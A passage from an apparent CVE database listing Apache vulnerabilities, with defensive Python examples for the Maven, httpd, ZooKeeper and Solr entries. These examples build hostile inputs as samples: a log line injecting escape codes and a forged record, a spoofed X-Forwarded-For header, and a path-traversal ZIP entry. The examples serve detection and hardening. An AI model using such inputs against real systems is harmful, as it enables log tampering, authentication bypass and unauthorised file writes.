Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2024-45507

Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.16. Users are recommended to upgrade to version 18.12.16, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-45626

The Apache James server JMAP HTML-to-plain-text implementation in versions below 3.8.2 and 3.7.6 is subject to unbounded memory consumption that can result in a denial of service. Users are recommended to upgrade to version 3.7.6 or 3.8.2, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache james_server *
CVE-2024-45627

In Apache Linkis < 1.7.0, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module is able to read arbitrary files from the Linkis server. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis < 1.7.0 are affected. We recommend users upgrade Linkis to version 1.7.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.9 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 2.5 3.4

Products Affected

Vendor Product Version
apache linkis *
CVE-2024-45693

Users logged into Apache CloudStack's web interface can be tricked into submitting malicious CSRF requests due to missing validation of the origin of the requests. This can allow an attacker to gain privileges and access to resources of the authenticated users and may lead to account takeover, disruption, exposure of sensitive data, and compromise of the integrity of the resources owned by the user account that are managed by the platform. This issue affects Apache CloudStack from 4.15.1.0 through 4.18.2.3 and 4.19.0.0 through 4.19.1.1. Users are recommended to upgrade to Apache CloudStack 4.18.2.4 or 4.19.1.2, or later, which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N 1.6 5.8

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-45719

Inadequate Encryption Strength vulnerability in Apache Answer. This issue affects Apache Answer: through 1.4.0. The ids generated using UUID version 1 are to some extent not secure enough, which can make the generated token predictable. Users are recommended to upgrade to version 1.4.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 2.6 LOW CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N 1.0 1.4

Products Affected

Vendor Product Version
apache answer *
CVE-2024-45720

On Windows platforms, a "best fit" character encoding conversion of command line arguments to Subversion's executables (e.g., svn.exe, etc.) may lead to unexpected command line argument interpretation, including argument injection and execution of other programs, if a specially crafted command line argument string is processed. All versions of Subversion up to and including Subversion 1.14.3 are affected on Windows platforms only. Users are recommended to upgrade to version Subversion 1.14.4, which fixes this issue. Subversion is not affected on UNIX-like platforms.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.2 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H 1.5 6.0

Products Affected

Vendor Product Version
apache subversion *
CVE-2024-45772

Deserialization of Untrusted Data vulnerability in Apache Lucene Replicator. This issue affects Apache Lucene's replicator module: from 4.4.0 before 9.12.0. The deprecated org.apache.lucene.replicator.http package is affected. The org.apache.lucene.replicator.nrt package is not affected. Users are recommended to upgrade to version 9.12.0, which fixes the issue. The deserialization can only be triggered if users actively deploy a network-accessible implementation and a corresponding client using an HTTP library that uses the API (e.g., a custom servlet and HTTPClient). Java serialization filters (such as -Djdk.serialFilter='!*' on the command line) can mitigate the issue on vulnerable versions without impacting functionality.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.1 MEDIUM CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L 1.0 3.7

Products Affected

Vendor Product Version
apache lucene *
apache lucene_replicator *
CVE-2024-45784

Apache Airflow versions before 2.10.3 contain a vulnerability that could expose sensitive configuration variables in task logs. This vulnerability allows DAG authors to unintentionally or intentionally log sensitive configuration variables. Unauthorized users could access these logs, potentially exposing critical data that could be exploited to compromise the security of the Airflow deployment. In version 2.10.3, secrets are now masked in task logs to prevent sensitive configuration variables from being exposed in the logging output. Users should upgrade to Airflow 2.10.3 or the latest version to eliminate this vulnerability. If you suspect that DAG authors could have logged the secret values to the logs and that your logs are not additionally protected, it is also recommended that you update those secrets.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-45791

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache HertzBeat. This issue affects Apache HertzBeat: before 1.6.1. Users are recommended to upgrade to version 1.6.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2024-46544

Incorrect Default Permissions vulnerability in Apache Tomcat Connectors allows local users to view and modify shared memory containing mod_jk configuration, which may lead to information disclosure and/or denial of service. This issue affects Apache Tomcat Connectors: from 1.2.9-beta through 1.2.49. Only mod_jk on Unix-like systems is affected. Neither the ISAPI redirector nor mod_jk on Windows is affected. Users are recommended to upgrade to version 1.2.50, which fixes the issue.

Products Affected

Vendor Product Version
apache tomcat_connectors *
debian debian_linux 11.0
CVE-2024-46901

Insufficient validation of filenames against control characters in Apache Subversion repositories served via mod_dav_svn allows authenticated users with commit access to commit a corrupted revision, leading to disruption for users of the repository. All versions of Subversion up to and including Subversion 1.14.4 are affected if serving repositories via mod_dav_svn. Users are recommended to upgrade to version 1.14.5, which fixes this issue. Repositories served via other access methods are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 3.1 LOW CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L 1.6 1.4

Products Affected

Vendor Product Version
apache subversion *
debian debian_linux 11.0
CVE-2024-46910

An authenticated user can perform XSS and potentially impersonate another user. This issue affects Apache Atlas versions 2.3.0 and earlier. Users are recommended to upgrade to version 2.4.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N 2.8 4.2

Products Affected

Vendor Product Version
apache atlas *
CVE-2024-46911

Cross-Site Request Forgery (CSRF) and privilege escalation vulnerability in Apache Roller. On multi-blog/user Roller websites, weblog owners are by default trusted to publish arbitrary weblog content; combined with a deficiency in Roller's CSRF protections, this allowed an escalation-of-privileges attack. This issue affects Apache Roller before 6.1.4. Roller users who run multi-blog/user Roller websites are recommended to upgrade to version 6.1.4, which fixes the issue. Roller 6.1.4 release announcement: https://lists.apache.org/thread/3c3f6rwqptyw6wdc95654fq5vlosqdpw

Products Affected

Vendor Product Version
apache roller *
CVE-2024-47197

Exposure of Sensitive Information to an Unauthorized Actor, Insecure Storage of Sensitive Information vulnerability in Maven Archetype Plugin. This issue affects Maven Archetype Plugin: from 3.2.1 before 3.3.0. Users are recommended to upgrade to version 3.3.0, which fixes the issue. Archetype integration testing creates a file called ./target/classes/archetype-it/archetype-settings.xml. This file contains all the content from the user's ~/.m2/settings.xml file, which often contains information they do not want to publish; on many developer machines this also includes credentials. When the user runs mvn verify again (without a mvn clean), this file becomes part of the final artifact. If a developer were to publish this into Maven Central or any other remote repository (whether as a release or a snapshot), their credentials would be published without them knowing.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache maven_archetype 3.2.1
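A pre-publish check for the leak described above, added here as an example; it is not part of the Maven Archetype Plugin or of any Apache project. It builds a small constructed jar in memory that mimics the layout the advisory describes (a copy of settings.xml left under archetype-it/ after a mvn verify without mvn clean), then scans the archive for that path and for credential-bearing tags inside any settings.xml it finds. The sample settings content and the set of tag names treated as secrets are assumptions for the example.

```python
import io
import re
import zipfile

# Path the advisory names; any other *settings.xml in the artifact is reported too.
LEAKED_PATH = "archetype-it/archetype-settings.xml"
# Tag names treated as credentials (assumption: the usual Maven <server> fields).
SECRET_TAGS = re.compile(r"<(password|passphrase|privateKey)>\s*([^<]+?)\s*</\1>", re.I)


def build_sample_artifact() -> bytes:
    """Constructed sample jar (not a real Maven build output): a class file,
    a manifest, and the stray archetype-settings.xml described in the advisory."""
    settings = (
        "<settings><servers><server><id>ossrh</id>"
        "<username>deployer</username><password>hunter2</password>"
        "</server></servers></settings>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
        zf.writestr(LEAKED_PATH, settings)
    return buf.getvalue()


def scan_artifact(jar_bytes: bytes) -> dict:
    """Report leaked settings files and the credential tags they carry.
    Secret values are masked to two characters so the report itself is safe to log."""
    findings = {"leaked_settings": [], "secret_tags": []}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if name == LEAKED_PATH or name.endswith("settings.xml"):
                findings["leaked_settings"].append(name)
                text = zf.read(name).decode("utf-8", "replace")
                for tag, value in SECRET_TAGS.findall(text):
                    findings["secret_tags"].append((name, tag.lower(), value[:2] + "***"))
    return findings


if __name__ == "__main__":
    report = scan_artifact(build_sample_artifact())
    print(report)  # expect one leaked file and one masked password
```

Run scan_artifact() over every jar under target/ as a release gate before mvn deploy; a non-empty report means the build directory was not cleaned. It is a detective control only: the fix is upgrading to 3.3.0 and building from a clean tree.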
CVE-2024-47208

Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.17. Users are recommended to upgrade to version 18.12.17, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-47248

Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Apache NimBLE. Specially crafted MESH message could result in memory corruption when non-default build configuration is used. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-47249

Improper Validation of Array Index vulnerability in Apache NimBLE. Lack of input validation for HCI events from the controller could result in out-of-bounds memory corruption and a crash. This issue requires a broken or bogus Bluetooth controller, and thus its severity is considered low. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.0 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 1.6 3.4

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-47250

Out-of-bounds Read vulnerability in Apache NimBLE. Missing validation of the HCI advertising report could lead to out-of-bounds access when parsing the HCI event, and thus to bogus GAP 'device found' events being sent. This issue requires a broken or bogus Bluetooth controller, and thus its severity is considered low. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.0 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L 1.6 3.4

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-47252

Insufficient escaping of user-supplied data in mod_ssl in Apache HTTP Server 2.4.63 and earlier allows an untrusted SSL/TLS client to insert escape characters into log files in some configurations. In a logging configuration where CustomLog is used with "%{varname}x" or "%{varname}c" to log variables provided by mod_ssl such as SSL_TLS_SNI, no escaping is performed by either mod_log_config or mod_ssl and unsanitized data provided by the client may appear in log files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
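An added example (not httpd or mod_ssl code) of what the unescaped path above lets a client do, and of the two controls a practitioner wants: a detector that flags log lines carrying raw control characters, and an escaping routine that renders them harmless before they reach a terminal or a log pipeline. The sample lines are constructed and assume a LogFormat of the shape "%h %{SSL_TLS_SNI}x \"%r\" %>s"; the escaping set is modelled on httpd's ap_escape_logitem() but is an approximation, not a copy of it.

```python
import re

# Constructed sample log lines, assumed to come from a format like
#   LogFormat "%h %{SSL_TLS_SNI}x \"%r\" %>s" tls_sni
# The second line's SNI field carries ESC [ 2 J (clear screen) followed by CR LF
# and a forged second record, written raw as the advisory describes.
SAMPLE_LOG = [
    '198.51.100.23 www.example.org "GET / HTTP/1.1" 200',
    '198.51.100.24 evil.example\x1b[2J\r\n203.0.113.9 admin.example "GET /secret HTTP/1.1" 200 "GET / HTTP/1.1" 200',
]

CONTROL = re.compile(r"[\x00-\x1f\x7f]")

# Named C escapes; everything else below 0x20 (and DEL) becomes \xHH.
_NAMED = {"\\": "\\\\", '"': '\\"', "\n": "\\n", "\r": "\\r",
          "\t": "\\t", "\b": "\\b", "\v": "\\v"}


def escape_field(value: str) -> str:
    """Escape a log field so that no raw control character survives.
    Approximates mod_log_config's escaping for the fields it controls."""
    out = []
    for ch in value:
        if ch in _NAMED:
            out.append(_NAMED[ch])
        elif ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def find_injected_lines(lines) -> list:
    """Indexes of lines that contain raw control characters, i.e. records where a
    client-supplied field was written without escaping."""
    return [i for i, line in enumerate(lines) if CONTROL.search(line)]


if __name__ == "__main__":
    for i in find_injected_lines(SAMPLE_LOG):
        print("suspicious record %d: %s" % (i, escape_field(SAMPLE_LOG[i])))
```

Run find_injected_lines() over raw access logs as a detection rule: a hit on a field that httpd normally escapes means either this configuration or a log-forwarder is writing unsanitized data. Until httpd is updated, avoid logging mod_ssl variables via %{...}x or %{...}c, or pass the log through escape_field()-style sanitisation before it is viewed in a terminal.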
CVE-2024-47552

Deserialization of Untrusted Data vulnerability in Apache Seata (incubating). This issue affects Apache Seata (incubating): from 2.0.0 before 2.2.0. Severity Justification: The Apache Seata security team assesses the severity of this vulnerability as "Low" due to stringent real-world mitigating factors. First, the vulnerability is strictly isolated to the Raft cluster mode, an optional and non-default feature introduced in v2.0.0, while most users rely on the unaffected traditional architecture. Second, Seata is an internal middleware; communication between TC and RM/TM occurs entirely within trusted internal networks. An attacker would require prior, unauthorized access to the Intranet to exploit this, making external exploitation highly improbable. Users are recommended to upgrade to version 2.2.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache seata *
CVE-2024-47554

Uncontrolled Resource Consumption vulnerability in Apache Commons IO. The org.apache.commons.io.input.XmlStreamReader class may excessively consume CPU resources when processing maliciously crafted input. This issue affects Apache Commons IO: from 2.0 before 2.14.0. Users are recommended to upgrade to version 2.14.0 or later, which fixes the issue.

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
netapp santricity_storage_plugin -
netapp e-series_santricity_web_services_proxy -
netapp snapcenter -
netapp ontap_tools 10
apache commons_io *
netapp e-series_santricity_unified_manager -
netapp bluexp -
netapp ontap_tools 9
CVE-2024-47561

Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code. Users are recommended to upgrade to version 1.11.4 or 1.12.0, which fix this issue.

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache avro *
netapp brocade_san_navigator -
CVE-2024-48019

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Files or Directories Accessible to External Parties vulnerability in Apache Doris. Application administrators can read arbitrary files from the server filesystem through path traversal. Users are recommended to upgrade to version 2.1.8, 3.0.3 or later, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache doris *
CVE-2024-48962

Improper Control of Generation of Code ('Code Injection'), Cross-Site Request Forgery (CSRF), Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.17. Users are recommended to upgrade to version 18.12.17, which fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-48988

SQL Injection vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue. This vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts. It can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication). As a result, the associated risk is considered relatively low.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L 2.8 4.7

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-50305

Valid Host header field can cause Apache Traffic Server to crash on some platforms. This issue affects Apache Traffic Server: from 9.2.0 through 9.2.5. Users are recommended to upgrade to version 9.2.6, which fixes the issue, or 10.0.2, which does not have the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-50306

Unchecked return value can allow Apache Traffic Server to retain privileges on startup. This issue affects Apache Traffic Server: from 9.2.0 through 9.2.5, from 10.0.0 through 10.0.1. Users are recommended to upgrade to version 9.2.6 or 10.0.2, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H 3.9 5.2

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-50378

Airflow versions before 2.10.3 have a vulnerability that allows authenticated users with audit log access to see sensitive values in audit logs which they should not see. When sensitive variables were set via airflow CLI, values of those variables appeared in the audit log and were stored unencrypted in the Airflow database. While this risk is limited to users with audit log access, it is recommended to upgrade to Airflow 2.10.3 or a later version, which addresses this issue. Users who previously used the CLI to set secret variables should manually delete entries with those variables from the log table.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-50379

Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration). This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
netapp bootstrap_os -
CVE-2024-50386

Account users in Apache CloudStack by default are allowed to register templates to be downloaded directly to the primary storage for deploying instances. Due to missing validation checks for KVM-compatible templates in CloudStack 4.0.0 through 4.18.2.4 and 4.19.0.0 through 4.19.1.2, an attacker who can register templates can use them to deploy malicious instances on KVM-based environments and exploit this to gain access to the host filesystems, which could result in the compromise of resource integrity and confidentiality, data loss, denial of service, and loss of availability of KVM-based infrastructure managed by CloudStack. Users are recommended to upgrade to Apache CloudStack 4.18.2.5 or 4.19.1.3, or later, which addresses this issue. Additionally, all user-registered KVM-compatible templates can be scanned and checked that they are flat files that do not use any additional or unnecessary features. For example, operators can run the following command on their file-based primary storage(s) and inspect the output. An empty output for the disk being validated means it has no references to the host filesystems; on the other hand, if the output for the disk being validated is not empty, it might indicate a compromised disk. However, bear in mind that (i) volumes created from templates will have references to the templates at first and (ii) volumes can be consolidated while migrating, losing their references to the templates. Therefore, the command execution for the primary storages can show both false positives and false negatives.

    for file in $(find /path/to/storage/ -type f -regex '[a-f0-9\-]*.*'); do
        echo "Retrieving file [$file] info. If the output is not empty, that might indicate a compromised disk; check it carefully."
        qemu-img info -U "$file" | grep file:
        printf "\n\n"
    done

For checking the whole template/volume features of each disk, operators can run the following command:

    for file in $(find /path/to/storage/ -type f -regex '[a-f0-9\-]*.*'); do
        echo "Retrieving file [$file] info."
        qemu-img info -U "$file"
        printf "\n\n"
    done

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2024-51504

When using IPAuthenticationProvider in ZooKeeper Admin Server there is a possibility of Authentication Bypass by Spoofing; this only impacts IP-based authentication implemented in ZooKeeper Admin Server. The default configuration of client IP address detection in IPAuthenticationProvider, which uses HTTP request headers, is weak and allows an attacker to bypass authentication by spoofing the client's IP address in request headers. The default configuration honors the X-Forwarded-For HTTP header to read the client's IP address. The X-Forwarded-For request header is mainly used by proxy servers to identify the client and can be easily spoofed by an attacker pretending that the request comes from a different IP address. Admin Server commands, such as snapshot and restore, can be executed arbitrarily on successful exploitation, which could potentially lead to information leakage or service availability issues. Users are recommended to upgrade to version 3.9.3, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H 3.9 5.2

Products Affected

Vendor Product Version
apache zookeeper *
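The weak pattern the advisory describes, beside a hardened resolver, as an added example; this is not ZooKeeper's IPAuthenticationProvider code and does not describe what 3.9.3 changed. The trusted-proxy range and the allowed-client range are assumptions for the example. The hardened version only consults X-Forwarded-For when the TCP peer is itself a trusted proxy, and then walks the header from the right, so that anything a client prepends on the left is ignored.

```python
import ipaddress

# Assumptions for this example: the reverse proxies that may legitimately set
# X-Forwarded-For, and the client range the Admin Server should accept.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED_CLIENTS = [ipaddress.ip_network("192.168.1.0/24")]


def is_in(addr: str, nets) -> bool:
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError:
        return False
    return any(ip in n for n in nets)


def weak_client_ip(peer_addr: str, headers: dict) -> str:
    """The bypassable pattern: honour X-Forwarded-For from any peer and take the
    leftmost hop, which is entirely under the sender's control."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return peer_addr


def hardened_client_ip(peer_addr: str, headers: dict) -> str:
    """Trust X-Forwarded-For only when the TCP peer is a trusted proxy, then walk
    the chain from the right, discarding trusted proxies; the first untrusted
    address is the client. An empty or all-proxy header falls back to the peer."""
    if not is_in(peer_addr, TRUSTED_PROXIES):
        return peer_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not is_in(hop, TRUSTED_PROXIES):
            return hop
    return peer_addr


def is_authorized(peer_addr: str, headers: dict, resolver) -> bool:
    """IP allow-list decision using the given resolver."""
    return is_in(resolver(peer_addr, headers), ALLOWED_CLIENTS)


if __name__ == "__main__":
    # Direct connection from an attacker who forges the header.
    spoof = {"X-Forwarded-For": "192.168.1.10"}
    print("weak:", is_authorized("203.0.113.5", spoof, weak_client_ip))        # True (bypass)
    print("hardened:", is_authorized("203.0.113.5", spoof, hardened_client_ip))  # False
```

If the Admin Server is not behind a proxy at all, the correct configuration is to ignore X-Forwarded-For entirely and use the peer address; header-based client identification is only meaningful when the header is set by an infrastructure component you control.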
CVE-2024-51569

Out-of-bounds Read vulnerability in Apache NimBLE. Missing validation of the HCI Number Of Completed Packets event could lead to out-of-bounds access when parsing the HCI event and an invalid read from HCI transport memory. This issue requires a broken or bogus Bluetooth controller, and thus its severity is considered low. This issue affects Apache NimBLE: through 1.7.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-51775

Missing Origin Validation in WebSockets vulnerability in Apache Zeppelin. An attacker could access the Zeppelin server from another origin without any restriction and obtain internal information about paragraphs. This issue affects Apache Zeppelin: from 0.11.1 before 0.12.0. Users are recommended to upgrade to version 0.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-51941

A remote code injection vulnerability exists in the Ambari Metrics and AMS Alerts feature, allowing authenticated users to inject and execute arbitrary code. The vulnerability occurs when processing alert definitions, where malicious input can be injected into the alert script execution path. An attacker with authenticated access can exploit this vulnerability to execute arbitrary commands on the server. The issue has been fixed in the latest versions of Ambari.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache ambari *
CVE-2024-52012

Relative Path Traversal vulnerability in Apache Solr. Solr instances running on Windows are vulnerable to arbitrary filepath write access, due to a lack of input sanitation in the "configset upload" API. Commonly known as a "zipslip", maliciously constructed ZIP files can use relative filepaths to write data to unanticipated parts of the filesystem. This issue affects Apache Solr: from 6.6 through 9.7.0. Users are recommended to upgrade to version 9.8.0, which fixes the issue. Users unable to upgrade may also safely prevent the issue by using Solr's "Rule-Based Authentication Plugin" to restrict access to the configset upload API, so that it can only be accessed by a trusted set of administrators/users.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache solr *
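The zip-slip check that an archive-accepting endpoint needs, as an added example; it is not Solr's configset code and does not reproduce its fix. It constructs a small sample archive with one legitimate entry and one entry whose name climbs out of the destination, then validates every entry against the resolved destination directory before anything is written, rejecting the whole archive if any entry is unsafe. Both POSIX and Windows absolute forms are rejected because the advisory names Windows as the affected platform; the entry names and destination path are assumptions for the example.

```python
import io
import ntpath
import posixpath
import zipfile
from pathlib import Path


def build_malicious_configset() -> bytes:
    """Constructed sample archive (not a real Solr configset): one legitimate file
    and one 'zip slip' entry with a relative path that escapes the target."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("solrconfig.xml", "<config/>")
        zf.writestr("../../evil.txt", "owned")
    return buf.getvalue()


def build_benign_configset() -> bytes:
    """Constructed sample archive with only well-behaved entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("conf/solrconfig.xml", "<config/>")
        zf.writestr("conf/managed-schema", "<schema/>")
    return buf.getvalue()


def unsafe_entries(zip_bytes: bytes, dest: str) -> list:
    """Names of entries that would land outside dest if extracted naively."""
    dest_real = Path(dest).resolve()
    bad = []
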